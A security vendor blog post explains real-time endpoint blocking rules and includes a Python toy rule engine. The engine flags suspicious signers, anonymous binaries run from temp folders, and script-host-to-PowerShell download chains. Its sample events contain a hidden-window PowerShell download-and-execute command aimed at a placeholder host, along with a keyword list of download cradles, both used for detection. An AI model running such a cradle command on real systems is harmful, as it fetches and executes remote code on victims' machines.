Inside Digital Guardian's Advanced Threat Protection: Part Three

by Tim Bandos on Wednesday November 15, 2017

In today's blog, the last in a three-part series, we break down what differentiates Digital Guardian's Advanced Threat Protection (ATP) capabilities from other endpoint detection and response (EDR) products. Read the first part in this series here and the second part here.

Advanced Threat Protection:

What differentiates ATP from other EDR-type products is its ability not only to detect but to block activity in real time. If your signatures and detections are all server-side and generated after logs have been sent up, that is not real time: by the time the detection fires, the activity has already happened on the endpoint. Adding real-time prevention is the ultimate goal, because it lets you thwart an attack while it is still in progress. Digital Guardian's ATP has this capability via its rules engine, which can also block based on any component of metadata observed in the logs. If you want to block a binary with a specific Signature Issuer because it has recently been reported that the signing company was compromised, no problem. If you want to block binaries that have no Company Name and no Product Version and are executed from a temporary directory, no problem. The rules engine can do all of the above and more, which puts the power in your hands rather than limiting you to whatever your security vendor tells you to block. One caveat worth keeping in mind: fields such as Company Name and Product Version come from the binary's own version resource and can be set to anything by whoever built it, so rules on them mostly catch careless tooling rather than a determined adversary, and any blocking rule should be run in alert-only mode first to measure false positives (legitimate installers routinely run from temporary directories).

ATP is by no means a full anti-virus replacement. Although it does a great job at detecting malware, it is designed to be much more than that, covering gaps that are commonly missed by traditional AV. A good example of what AV misses is the misuse of built-in Windows commands for nefarious purposes. If an email attachment contains a malicious piece of JavaScript that simply calls PowerShell to download and execute a binary from the internet, ATP can detect that entire attack chain: the JavaScript running in the script host, the PowerShell process it spawns, and the download and execution that follow. Because these are legitimate, signed Windows binaries, no file signature will flag them; the detection has to come from the process relationships and command lines. Rules can also be extended continuously as new threat intelligence is acquired or new tactics, techniques and procedures (TTPs) are observed in the wild.
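To make the two ideas above concrete (metadata-based blocking rules from the previous paragraph, and detection of the script-host-to-PowerShell attack chain from this one), here is a toy real-time rule engine in Python. It is example code added for this article, not Digital Guardian's rules engine or its event schema: the `ProcEvent` fields, the `COMPROMISED_SIGNERS` entry, the download-cradle keywords, the rule names and the sample process-creation events are all constructed for the demonstration. Each event is evaluated at process-creation time, and the engine keeps a process table so a rule can inspect the full parent chain rather than a single event.

```python
"""Toy endpoint rule engine over constructed Windows process-creation events.

Added example, not Digital Guardian's code or schema. Every field name, signer,
rule and sample event below is constructed for illustration.
"""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple


@dataclass
class ProcEvent:
    """One process-creation event as a sensor might report it (constructed shape)."""
    pid: int
    ppid: int
    image: str                          # full path of the executed binary
    cmdline: str
    signer: Optional[str] = None        # Authenticode signature issuer; None = unsigned
    company: Optional[str] = None       # version-resource Company Name
    product_version: Optional[str] = None  # version-resource Product Version


# Hypothetical issuer reported as compromised; in practice this comes from threat intel.
COMPROMISED_SIGNERS = {"example software signing co"}
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")
# Substrings typical of PowerShell download cradles (matched case-insensitively).
DOWNLOAD_CRADLES = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "net.webclient", "start-bitstransfer")


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def in_temp_dir(path: str) -> bool:
    return "\\temp\\" in path.lower()


# A rule is (name, action, predicate(event, ancestry)); ancestry is parent-first.
Rule = Tuple[str, str, Callable[[ProcEvent, List[ProcEvent]], bool]]


def compromised_signer(ev: ProcEvent, ancestry: List[ProcEvent]) -> bool:
    """Block anything signed by an issuer on the compromised list, wherever it runs."""
    return ev.signer is not None and ev.signer.lower() in COMPROMISED_SIGNERS


def anonymous_temp_binary(ev: ProcEvent, ancestry: List[ProcEvent]) -> bool:
    """Block binaries with no Company Name and no Product Version run from a temp dir."""
    return ev.company is None and ev.product_version is None and in_temp_dir(ev.image)


def script_host_powershell_download(ev: ProcEvent, ancestry: List[ProcEvent]) -> bool:
    """Alert on PowerShell with a download cradle that descends from a script host."""
    if basename(ev.image) not in POWERSHELL:
        return False
    spawned_by_script = any(basename(a.image) in SCRIPT_HOSTS for a in ancestry)
    cmd = ev.cmdline.lower()
    return spawned_by_script and any(c in cmd for c in DOWNLOAD_CRADLES)


RULES: List[Rule] = [
    ("block_compromised_signer", "BLOCK", compromised_signer),
    ("block_anonymous_temp_binary", "BLOCK", anonymous_temp_binary),
    ("alert_script_host_powershell_download", "ALERT", script_host_powershell_download),
]


class RuleEngine:
    def __init__(self, rules: List[Rule] = RULES) -> None:
        self.rules = rules
        self.procs: Dict[int, ProcEvent] = {}   # pid -> event, for ancestry lookups

    def ancestry(self, ev: ProcEvent) -> List[ProcEvent]:
        """Walk ppid links through the process table; stops at unknown or cyclic pids."""
        chain, ppid, seen = [], ev.ppid, set()
        while ppid in self.procs and ppid not in seen:
            seen.add(ppid)
            parent = self.procs[ppid]
            chain.append(parent)
            ppid = parent.ppid
        return chain

    def on_process_create(self, ev: ProcEvent) -> List[Tuple[str, str]]:
        """Evaluate every rule at creation time and return (rule, action) verdicts."""
        verdicts = [(name, action) for name, action, pred in self.rules
                    if pred(ev, self.ancestry(ev))]
        self.procs[ev.pid] = ev   # record even if blocked so later lookups still resolve
        return verdicts


# Constructed sample events: mail client -> script host -> PowerShell cradle -> dropped binary,
# plus an unrelated binary signed by the hypothetical compromised issuer.
SAMPLE_EVENTS = [
    ProcEvent(100, 4, r"C:\Windows\explorer.exe", "explorer.exe",
              "Microsoft Windows", "Microsoft Corporation", "10.0"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
              "outlook.exe", "Microsoft Corporation", "Microsoft Corporation", "16.0"),
    ProcEvent(300, 200, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\alice\AppData\Local\Temp\invoice.js"',
              "Microsoft Windows", "Microsoft Corporation", "5.8"),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/p')\"",
              "Microsoft Windows", "Microsoft Corporation", "10.0"),
    ProcEvent(500, 400, r"C:\Users\alice\AppData\Local\Temp\update.exe", "update.exe"),
    ProcEvent(600, 100, r"C:\Program Files\Vendor\tool.exe", "tool.exe",
              "Example Software Signing Co", "Vendor Inc", "2.1.0"),
]


def run_demo(events: List[ProcEvent] = SAMPLE_EVENTS) -> Dict[int, List[Tuple[str, str]]]:
    """Feed the sample stream through the engine and return verdicts keyed by pid."""
    engine = RuleEngine()
    return {ev.pid: engine.on_process_create(ev) for ev in events}


if __name__ == "__main__":
    for pid, verdicts in run_demo().items():
        print(pid, verdicts or "no match")
```

The cradle rule is deliberately an ALERT rather than a BLOCK so that the sample chain continues and the dropped, anonymous binary in the temp directory is caught by the metadata rule on the next event; in a real deployment a blocked process never spawns children, so a prevention rule on the PowerShell step would end the chain there. New rules should be introduced in alert mode like this one and promoted to BLOCK only after their false-positive rate on real traffic is known.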

Ultimately, leveraging both real-time detection and historical detection provides a more encompassing, layered approach to host-based threat detection: real-time rules stop what you already know to look for, while historical detection lets you search previously collected activity once a new indicator or TTP comes to light. Digital Guardian's ATP technology employs both to ensure incident responders and security analysts are well equipped to deter, detect and neutralize cyber-attacks.

Tags:  Advanced Threat Protection
